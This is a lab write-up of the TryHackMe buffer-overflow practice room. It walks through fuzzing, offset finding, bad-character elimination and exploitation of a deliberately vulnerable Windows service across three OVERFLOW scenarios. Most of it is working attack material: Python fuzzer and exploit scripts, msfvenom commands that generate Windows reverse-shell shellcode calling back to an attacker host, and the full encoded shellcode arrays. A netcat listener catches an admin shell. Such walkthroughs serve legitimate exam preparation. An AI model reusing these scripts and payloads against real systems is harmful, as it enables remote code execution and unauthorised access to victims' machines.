OSCP Buffer Overflow write-up from TryHackMe

Try Hack Me recently released a free room created by Tib3rius on the tryhackme.com site for anyone wanting to learn more about exploiting buffer overflows. The room includes a machine that can be deployed with the vulnerable app and the primary needed tool; Immunity Debugger. All exploitation in this write-up is performed remotely using Kali Linux.

The room includes 10 OVERFLOW scenarios that are similar to what is found on the OSCP exam. The Pre-work below is executed in each OVERFLOW scenario.

Pre-work

If you are using kali linux, you will need a remote desktop application to allow access to the Windows server GUI. I used xfreerdp as recommended.

kali@kali:~/Documents/bufferoverflow$ sudo apt install freerdp2-x11 freerdp2-shadow-x11
kali@kali:~/Documents/bufferoverflow$ sudo apt-get upgrade

Connect to Windows server with freerdp.

kali@kali:~/Documents/bufferoverflow$ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.158.136

Start Immunity Debugger as admin.

Now lets open the vulnerable exe. File -> open

The application will be loaded into the debugger in the “Paused” state. Select the run button on the upper bar within Immunity Debugger.

Ensure the exe is running by checking the status in the lower right of Immunity Debugger.

Set the working folder within mona. For more information on mona check out the project here.

Copy the fuzzer.py code provided within the tryhackme room.

import socket, time, sys

ip = "10.10.158.136"
port = 1337
timeout = 5

buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        print("Fuzzing with %s bytes" % len(string))
        s.send("OVERFLOW1 " + string + "\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)

Add execute permissions to the .py

ali@kali:~/Documents/bufferoverflow$ sudo chmod +x fuzzer.py

Also copy the exploit.py code.

import socket

ip = "10.10.158.136"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

Add execute permissions to the .py

ali@kali:~/Documents/bufferoverflow$ sudo chmod +x exploit.py

OVERFLOW 1

To start the OVERFLOW 1 challenge we will need to netcat to the service and run the “OVERFLOW1 test” command.

kali@kali:~/Documents/bufferoverflow$ nc 10.10.158.136 1337
Welcome to OSCP Vulnerable Server! Enter HELP for help.
OVERFLOW1 test
OVERFLOW1 COMPLETE

Kick off the fuzzer.py against the target IP.

kali@kali:~/Documents/bufferoverflow$ python fuzzer.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing with 800 bytes
Fuzzing with 900 bytes
Fuzzing with 1000 bytes
Fuzzing with 1100 bytes
Fuzzing with 1200 bytes
Fuzzing with 1300 bytes
Fuzzing with 1400 bytes
Fuzzing with 1500 bytes
Fuzzing with 1600 bytes
Fuzzing with 1700 bytes
Fuzzing with 1800 bytes
Fuzzing with 1900 bytes
Fuzzing with 2000 bytes
Could not connect to 10.10.158.136:1337

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9

Copy the string from the ruby script into the payload variable within the exploit.py

Ensure oscp.exe is running within Immunity Debugger. Execute exploit.py against the target.

kali@kali:~/Documents/bufferoverflow$ python exploit.py
Sending evil buffer...
Done!

Back in Immunity search for the pattern using mona.

Switch over to the log window in Immunity Debugger with Alt+L and look for the “EIP contains normal pattern : “

Update the offset and the retn variable.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Take note of the ESP address because we will be using the values in this position in future steps. Copy the string generator from the buffer overflow room.

from __future__ import print_function

for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')

print()
kali@kali:~/Documents/bufferoverflow$ python bytegen.py
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

Drop the new generated string into the payload variable in the exploit.py.

This generated string has already removed the \x00 so we need to remove that from the .bin with mona.

Ensure the .exe is running and kick off exploit.py. Now compare the .bin to the loaded payload with mona.

At this point I start removing the bad characters one at a time. I removed one bad character at a time by repeating the following steps:

  • Remove character from byte array
  • Remove character from exploit payload
  • Start exe
  • Compare using mona

The goal here is to see unmodified for the ESP address.

Next use mona to find all addresses that do not include the bad characters.

Any of the addresses from the results above may be used as the retn value in the exploit. Little endian = Reverse. Also add padding to allow the payload to unpack.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\x07\x2e\a0" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xbb\x2a\xf8\xb7\x9c\xd9\xc7\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x0e\x03\x70\xf6\x55"
buf += b"\x69\x78\xee\x18\x92\x80\xef\x7c\x1a\x65\xde\xbc\x78"
buf += b"\xee\x71\x0d\x0a\xa2\x7d\xe6\x5e\x56\xf5\x8a\x76\x59"
buf += b"\xbe\x21\xa1\x54\x3f\x19\x91\xf7\xc3\x60\xc6\xd7\xfa"
buf += b"\xaa\x1b\x16\x3a\xd6\xd6\x4a\x93\x9c\x45\x7a\x90\xe9"
buf += b"\x55\xf1\xea\xfc\xdd\xe6\xbb\xff\xcc\xb9\xb0\x59\xcf"
buf += b"\x38\x14\xd2\x46\x22\x79\xdf\x11\xd9\x49\xab\xa3\x0b"
buf += b"\x80\x54\x0f\x72\x2c\xa7\x51\xb3\x8b\x58\x24\xcd\xef"
buf += b"\xe5\x3f\x0a\x8d\x31\xb5\x88\x35\xb1\x6d\x74\xc7\x16"
buf += b"\xeb\xff\xcb\xd3\x7f\xa7\xcf\xe2\xac\xdc\xf4\x6f\x53"
buf += b"\x32\x7d\x2b\x70\x96\x25\xef\x19\x8f\x83\x5e\x25\xcf"
buf += b"\x6b\x3e\x83\x84\x86\x2b\xbe\xc7\xce\x98\xf3\xf7\x0e"
buf += b"\xb7\x84\x84\x3c\x18\x3f\x02\x0d\xd1\x99\xd5\x72\xc8"
buf += b"\x5e\x49\x8d\xf3\x9e\x40\x4a\xa7\xce\xfa\x7b\xc8\x84"
buf += b"\xfa\x84\x1d\x0a\xaa\x2a\xce\xeb\x1a\x8b\xbe\x83\x70"
buf += b"\x04\xe0\xb4\x7b\xce\x89\x5f\x86\x99\xbf\x99\x86\xf1"
buf += b"\xa8\xa7\x96\x1f\x45\x21\x70\x75\x85\x67\x2b\xe2\x3c"
buf += b"\x22\xa7\x93\xc1\xf8\xc2\x94\x4a\x0f\x33\x5a\xbb\x7a"
buf += b"\x27\x0b\x4b\x31\x15\x9a\x54\xef\x31\x40\xc6\x74\xc1"
buf += b"\x0f\xfb\x22\x96\x58\xcd\x3a\x72\x75\x74\x95\x60\x84"
buf += b"\xe0\xde\x20\x53\xd1\xe1\xa9\x16\x6d\xc6\xb9\xee\x6e"
buf += b"\x42\xed\xbe\x38\x1c\x5b\x79\x93\xee\x35\xd3\x48\xb9"
buf += b"\xd1\xa2\xa2\x7a\xa7\xaa\xee\x0c\x47\x1a\x47\x49\x78"
buf += b"\x93\x0f\x5d\x01\xc9\xaf\xa2\xd8\x49\xcf\x40\xc8\xa7"
buf += b"\x78\xdd\x99\x05\xe5\xde\x74\x49\x10\x5d\x7c\x32\xe7"
buf += b"\x7d\xf5\x37\xa3\x39\xe6\x45\xbc\xaf\x08\xf9\xbd\xe5"

Copy the payload into the exploit.py and set the payload variable equal to buf.

Start up a listener with netcat.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...

Start the vulnerable application again. Execute exploit.py. Now looking back at netcat.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.57.195] 49258
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

Nice! All worked as expected.

OVERFLOW2

The remainder of the overflows are just for practice. Starting with offset discovery.

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow2$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with Encoding failed due to a bad character (index=21, char=0x83)
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=112, char=0x23)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with Encoding failed due to a bad character (index=17, char=0x83)
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive succeeded with size 353 (iteration=0)
x86/jmp_call_additive chosen with final size 353
Payload size: 353 bytes
Final size of py file: 1731 bytes
buf =  b""
buf += b"\xfc\xbb\x03\x99\xf9\xc0\xeb\x0c\x5e\x56\x31\x1e\xad"
buf += b"\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xff"
buf += b"\x71\x7b\xc0\xff\x81\x1c\x48\x1a\xb0\x1c\x2e\x6f\xe3"
buf += b"\xac\x24\x3d\x08\x46\x68\xd5\x9b\x2a\xa5\xda\x2c\x80"
buf += b"\x93\xd5\xad\xb9\xe0\x74\x2e\xc0\x34\x56\x0f\x0b\x49"
buf += b"\x97\x48\x76\xa0\xc5\x01\xfc\x17\xf9\x26\x48\xa4\x72"
buf += b"\x74\x5c\xac\x67\xcd\x5f\x9d\x36\x45\x06\x3d\xb9\x8a"
buf += b"\x32\x74\xa1\xcf\x7f\xce\x5a\x3b\x0b\xd1\x8a\x75\xf4"
buf += b"\x7e\xf3\xb9\x07\x7e\x34\x7d\xf8\xf5\x4c\x7d\x85\x0d"
buf += b"\x8b\xff\x51\x9b\x0f\xa7\x12\x3b\xeb\x59\xf6\xda\x78"
buf += b"\x55\xb3\xa9\x26\x7a\x42\x7d\x5d\x86\xcf\x80\xb1\x0e"
buf += b"\x8b\xa6\x15\x4a\x4f\xc6\x0c\x36\x3e\xf7\x4e\x99\x9f"
buf += b"\x5d\x05\x34\xcb\xef\x44\x51\x38\xc2\x76\xa1\x56\x55"
buf += b"\x05\x93\xf9\xcd\x81\x9f\x72\xc8\x56\xdf\xa8\xac\xc8"
buf += b"\x1e\x53\xcd\xc1\xe4\x07\x9d\x79\xcc\x27\x76\x79\xf1"
buf += b"\xfd\xd9\x29\x5d\xae\x99\x99\x1d\x1e\x72\xf3\x91\x41"
buf += b"\x62\xfc\x7b\xea\x09\x07\xec\x1f\xc8\x09\x44\x77\xd6"
buf += b"\x15\x8a\xe4\x5f\xf3\xd8\xe4\x09\xac\x74\x9c\x13\x26"
buf += b"\xe4\x61\x8e\x43\x26\xe9\x3d\xb4\xe9\x1a\x4b\xa6\x9e"
buf += b"\xea\x06\x94\x09\xf4\xbc\xb0\xd6\x67\x5b\x40\x90\x9b"
buf += b"\xf4\x17\xf5\x6a\x0d\xfd\xeb\xd5\xa7\xe3\xf1\x80\x80"
buf += b"\xa7\x2d\x71\x0e\x26\xa3\xcd\x34\x38\x7d\xcd\x70\x6c"
buf += b"\xd1\x98\x2e\xda\x97\x72\x81\xb4\x41\x28\x4b\x50\x17"
buf += b"\x02\x4c\x26\x18\x4f\x3a\xc6\xa9\x26\x7b\xf9\x06\xaf"
buf += b"\x8b\x82\x7a\x4f\x73\x59\x3f\x6f\x96\x4b\x4a\x18\x0f"
buf += b"\x1e\xf7\x45\xb0\xf5\x34\x70\x33\xff\xc4\x87\x2b\x8a"
buf += b"\xc1\xcc\xeb\x67\xb8\x5d\x9e\x87\x6f\x5d\x8b\x87\x8f"
buf += b"\xa1\x34"
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...

OVERFLOW 3

Kick off the fuzzer.py against the target IP.

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow/overflow3$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1700
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow3$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -f py                                                              
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with Encoding failed due to a bad character (index=20, char=0xee)
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=275, char=0x11)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with Encoding failed due to a bad character (index=4, char=0xee)
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive succeeded with size 353 (iteration=0)
x86/jmp_call_additive chosen with final size 353
Payload size: 353 bytes
Final size of py file: 1731 bytes
buf =  b""
buf += b"\xfc\xbb\x7f\xbc\xf0\xa1\xeb\x0c\x5e\x56\x31\x1e\xad"
buf += b"\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x83"
buf += b"\x54\x72\xa1\x7b\xa5\x13\x2b\x9e\x94\x13\x4f\xeb\x87"
buf += b"\xa3\x1b\xb9\x2b\x4f\x49\x29\xbf\x3d\x46\x5e\x08\x8b"
buf += b"\xb0\x51\x89\xa0\x81\xf0\x09\xbb\xd5\xd2\x30\x74\x28"
buf += b"\x13\x74\x69\xc1\x41\x2d\xe5\x74\x75\x5a\xb3\x44\xfe"
buf += b"\x10\x55\xcd\xe3\xe1\x54\xfc\xb2\x7a\x0f\xde\x35\xae"
buf += b"\x3b\x57\x2d\xb3\x06\x21\xc6\x07\xfc\xb0\x0e\x56\xfd"
buf += b"\x1f\x6f\x56\x0c\x61\xa8\x51\xef\x14\xc0\xa1\x92\x2e"
buf += b"\x17\xdb\x48\xba\x83\x7b\x1a\x1c\x6f\x7d\xcf\xfb\xe4"
buf += b"\x71\xa4\x88\xa2\x95\x3b\x5c\xd9\xa2\xb0\x63\x0d\x23"
buf += b"\x82\x47\x89\x6f\x50\xe9\x88\xd5\x37\x16\xca\xb5\xe8"
buf += b"\xb2\x81\x58\xfc\xce\xc8\x34\x31\xe3\xf2\xc4\x5d\x74"
buf += b"\x81\xf6\xc2\x2e\x0d\xbb\x8b\xe8\xca\xbc\xa1\x4d\x44"
buf += b"\x43\x4a\xae\x4d\x80\x1e\xfe\xe5\x21\x1f\x95\xf5\xce"
buf += b"\xca\x3a\xa5\x60\xa5\xfa\x15\xc1\x15\x93\x7f\xce\x4a"
buf += b"\x83\x80\x04\xe3\x2e\x7b\xcf\x06\xa9\x8d\xa7\x7f\xb7"
buf += b"\x91\xa9\x13\x3e\x77\xbf\xfb\x16\x20\x28\x65\x33\xba"
buf += b"\xc9\x6a\xe9\xc7\xca\xe1\x1e\x38\x84\x01\x6a\x2a\x71"
buf += b"\xe2\x21\x10\xd4\xfd\x9f\x3c\xba\x6c\x44\xbc\xb5\x8c"
buf += b"\xd3\xeb\x92\x63\x2a\x79\x0f\xdd\x84\x9f\xd2\xbb\xef"
buf += b"\x1b\x09\x78\xf1\xa2\xdc\xc4\xd5\xb4\x18\xc4\x51\xe0"
buf += b"\xf4\x93\x0f\x5e\xb3\x4d\xfe\x08\x6d\x21\xa8\xdc\xe8"
buf += b"\x09\x6b\x9a\xf4\x47\x1d\x42\x44\x3e\x58\x7d\x69\xd6"
buf += b"\x6c\x06\x97\x46\x92\xdd\x13\x66\x71\xf7\x69\x0f\x2c"
buf += b"\x92\xd3\x52\xcf\x49\x17\x6b\x4c\x7b\xe8\x88\x4c\x0e"
buf += b"\xed\xd5\xca\xe3\x9f\x46\xbf\x03\x33\x66\xea\x03\xb3"
buf += b"\x98\x15"

Next use mona to find all addresses that do not include the bad characters.

